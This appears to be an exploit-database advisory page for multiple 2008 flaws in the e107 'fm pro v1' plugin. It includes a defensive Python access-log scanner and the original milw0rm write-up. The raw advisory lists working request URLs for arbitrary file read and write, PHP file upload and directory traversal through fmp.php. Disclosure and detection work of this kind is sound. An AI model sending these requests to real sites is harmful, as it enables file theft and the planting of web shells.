Vendor: Plugin fm pro v1
By: milw0rm.com
CVSS: 7.5 (HIGH)
Vulnerability types: Remote File Disclosure, Remote File Upload, Local Directory Traversal
CWE: 22, 434, 264
Product Name: Plugin fm pro v1
Affected Version From: v1
Affected Version To: v1
Patch Exists: YES
Year: 2008

e107 Plugin fm pro v1 Multiple Remote Vulnerabilities

The e107 Plugin fm pro v1 is affected by multiple remote vulnerabilities: Remote File Disclosure, Remote File Upload, and Local Directory Traversal. The Remote File Disclosure vulnerability allows an attacker to view any file on the server. The Remote File Upload vulnerability allows an attacker to upload a malicious PHP file to the server. The Local Directory Traversal vulnerability allows an attacker to view, rename, delete, and edit any folder or file on the server.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users should update to the latest version of the e107 Plugin fm pro v1.
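
For sites that ran the plugin before patching, the web server access log can be checked for the fmp.php request patterns listed in the raw advisory on this page. The following is an added example, not code from the advisory or the vendor; it assumes Apache common/combined log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter names come from the advisory text on this page.
PLUGIN_PATH = "/e107_plugins/fm_pro_v1/fmp.php"
ACTION_LABELS = {
    "confirm_edit_file": "file read/write (fm_filename)",
    "confirm_upload_file": "file upload",
}
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (ip, method, status, finding) for an fm pro request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    if not unquote(url.path).lower().endswith(PLUGIN_PATH):
        return None
    # parse_qs percent-decodes values; keep_blank_values keeps an empty "fm_dir=".
    query = parse_qs(url.query, keep_blank_values=True)
    action = query.get("fm_action", [""])[0]
    fm_dir = query.get("fm_dir", [""])[0]
    if action in ACTION_LABELS:
        finding = ACTION_LABELS[action]
    elif fm_dir:
        finding = "directory browse: fm_dir=" + fm_dir
    else:
        finding = "plugin access"
    return ip, method, int(status), finding

def scan(lines):
    """Classify each log line and keep only requests that reached the plugin."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Oct/2008:10:00:01 +0000] "GET /e107_plugins/fm_pro_v1/fmp.php?fm_dir=e107_admin HTTP/1.1" 200 5120',
    '203.0.113.7 - - [29/Oct/2008:10:00:09 +0000] "GET /e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_edit_file&fm_filename=example.txt HTTP/1.1" 200 812',
    '198.51.100.9 - - [29/Oct/2008:10:02:30 +0000] "POST /e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_upload_file HTTP/1.1" 200 640',
    '192.0.2.44 - - [29/Oct/2008:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 9001',
    '192.0.2.44 - - [29/Oct/2008:10:03:05 +0000] "GET /e107_plugins/fm_pro_v1/fmp.php HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits on the upload or edit actions with a 2xx status are the ones to review first, together with any PHP files created in the e107 directory around the same time.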

Exploit-DB raw data:

 _____   ____   __   __     _       ____        ____    ____ 
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

e107 Plugin fm pro v1 Multiple Remote Vulnerabilities

I- Remote File Disclosure  / Write File 
/e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_edit_file&fm_filename={File}

II- Remote File Upload 
/e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_upload_file
You Can Upload PHP File 
Get File in site.com/{path e107}/[name your file - as - 020.php]

III- Local Directory Traversal
/e107_plugins/fm_pro_v1/fmp.php?fm_dir=e107_admin
And You Can [Rename] [Delete] [View] [Edit] Any Folder Or File


        ____           _           _           __  __ 
       / ___|   ___   | |       __| |         |  \/  |
      | |  _   / _ \  | |      / _` |         | |\/| |
      | |_| | | (_) | | |___  | (_| |         | |  | |
       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
                                      |_____|         


# milw0rm.com [2008-10-29]